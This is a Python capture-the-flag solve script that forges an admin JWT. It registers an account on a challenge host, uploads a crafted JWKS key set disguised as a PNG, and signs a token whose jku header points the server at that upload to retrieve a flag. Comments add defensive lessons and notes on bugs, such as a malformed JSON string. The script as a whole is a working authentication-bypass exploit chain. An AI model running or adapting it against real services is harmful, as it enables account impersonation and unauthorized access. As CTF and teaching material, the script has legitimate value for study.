#!/usr/bin/env python3
#exploit written by ryn0(krn_bhargav)
#
# CTF solve script. The weakness it demonstrates is a JWT verifier that
# trusts the token's own `jku` header: the server fetches its signing-key
# set (JWKS) from whatever URL the token names, and because authenticated
# users can upload files that are served back from the same origin, an
# uploaded JWKS becomes a "trusted" key set. Defensive takeaways for anyone
# reading this as a case study:
#   - never dereference `jku` / `x5u` taken from an unverified token; pin
#     the JWKS location in server configuration (or allow-list exact hosts
#     and paths) and resolve `kid` only against that pinned set;
#   - serve user uploads from a separate origin and with a fixed
#     content-type, so uploaded bytes can never be interpreted as config;
#   - log and alert on key-set fetches to unexpected paths — a JWKS fetch
#     hitting an uploads directory is a clear detection signal.
from requests import Session,get
from bs4 import BeautifulSoup
import jwt
# Target and fixed test values. `pub_key` is read but never used below;
# both key files are opened without a context manager, so the handles are
# left to the garbage collector.
url = 'http://chall.nitdgplug.org:30623'
pub_key = open('pub.key','r').read()
pvt_key = open('pvt.key','r').read()
# RSA modulus that is embedded verbatim into the uploaded JWKS; it is expected
# to correspond to `pvt_key` (assumption — the script never checks this).
n='AL2dm+Myrfhs96B/kMzGkxeUnkuSDBf9axQ2PvRBLGCAo5CpCwNJBIS5pjr9InHCuJhs4486tZt3Fplxe9KmpnJQpuN7Q/LU6ZAF2QXsdWmj1IkLjYJ+7iecCSSZZjtiPtnZN/Pkyv/1FjxWm8p9pHoVjJ+dcw9TtufaAzJ2jilBQrhUFSPEu5863vyJT1Ov1otuTg12C7rs13RCcSaQhpf9lRmYM1HZ0aiqLgrQO+PPaGWYnk42hJHgn2TVsLt4+fkCaVzx7zHQ52dzLoAr+DKOCu9NcEzHKNSQRqlv+OwP2dLcPiRtdO9KnBT1V5j5UilKIU9lCAJOX43ZEDHZycU='
kid='ryn0'
username = 'ryn0_123'
password = 'best_of_future_from_ryn0'
# Subject claim the forged token carries; the page gives no source for it.
admin_uuid = '683999a1-8bea-4278-876a-5ba278ea7917'
# One session so the login cookie set by /login is reused by /uploads.
s = Session()
def register():
    """Create the throwaway account on the challenge host.

    Returns True when /register answers with a 302 (treated as success),
    False for any other status. On a transport error the exception is
    printed and the function falls off the end, returning None — callers
    only test truthiness, so that reads as failure.
    """
    try:
        r = s.post(url+'/register',data={'username':username,'password':password},allow_redirects=False)
        if r.status_code == 302:
            return True
        return False
    except Exception as e:
        print(e)
def login():
    """Log the account in on the shared session.

    Same contract as register(): True on a 302 from /login, False on any
    other status, None (after printing) on a transport error.
    """
    try:
        r = s.post(url+'/login',data={'username':username,'password':password},allow_redirects=False)
        if r.status_code == 302:
            return True
        return False
    except Exception as e:
        print(e)
def upload_jwt():
    """Upload a JWKS document disguised as an image and return its path.

    Writes the key set to payload.png, posts it to /uploads, and scrapes the
    resulting <img class="card-img-top"> src from the 200 response. Returns
    '/' + that src, None on a non-200 response, and None (after printing)
    on an exception.

    Review notes: the JSON is assembled by string concatenation, which is
    fragile — as written the closing quote after `n` is preceded by a stray
    `}`, so the document is probably not what the author intended. The
    file object passed to `files=` is never closed. The only reason this
    works at all is the server-side trust in `jku` described at the top of
    the file.
    """
    payload='{"keys":[{"alg":"RS256","e":"AQAB","kid":"'+kid+'","kty":"RSA","n":"'+n+'}","use":"sig"}]}'
    with open('payload.png','w') as fl:
        fl.write(payload)
    try:
        r = s.post(url+'/uploads',files={'fileUpload':('payload.png',open('payload.png','rb'))})
        if(r.status_code == 200):
            soap = BeautifulSoup(r.text,'lxml')
            img=soap.find('img',{'class':'card-img-top'})
            # Raises TypeError/KeyError if the card image is absent; the
            # broad except below turns that into a printed message + None.
            return '/'+ str(img['src'])
        return None
    except Exception as e:
        print(e)
def generateMaliciousJWT(jku):
    """Sign a token whose `jku` header points back at the uploaded JWKS.

    `jku` is the server-relative path returned by upload_jwt(); it is
    joined to `url` so the verifier fetches the key set from the same
    origin it serves. A verifier that pinned its JWKS location, or refused
    `jku` altogether, would reject this token outright.
    """
    return jwt.encode({'uuid':admin_uuid},pvt_key,algorithm='RS256',headers={ 'kid':kid, 'jku':url+jku })
def getFlag(jt):
    """Present the forged token as the session cookie and read the flag.

    Returns the text of the first <h2> on a 200 response from /gallery,
    otherwise None. Note `jt.decode()` assumes jwt.encode() returned bytes;
    that is true for PyJWT 1.x, while 2.x returns str — version-dependent,
    so confirm against the installed library.
    """
    try:
        r = get(url+'/gallery',cookies={'session':str(jt.decode())})
        if(r.status_code == 200 ):
            soup = BeautifulSoup(r.text,'lxml')
            return soup.find('h2').text
    except Exception as e:
        print(e)
if __name__ == '__main__':
    # Each step is only attempted if the previous one reported success;
    # a failed upload is silent (no else branch for `if(jku)`).
    if(register()):
        print('[+] Register Successfull')
        if(login()):
            print('[+] login Successfull')
            jku = upload_jwt()
            if(jku):
                jt=generateMaliciousJWT(jku)
                print(f'jwt generated : {jt}\n\n')
                print(f'flag : {getFlag(jt)}')
        else:
            print('[-] Not able to login')
    else:
        print('[-] Not able to register')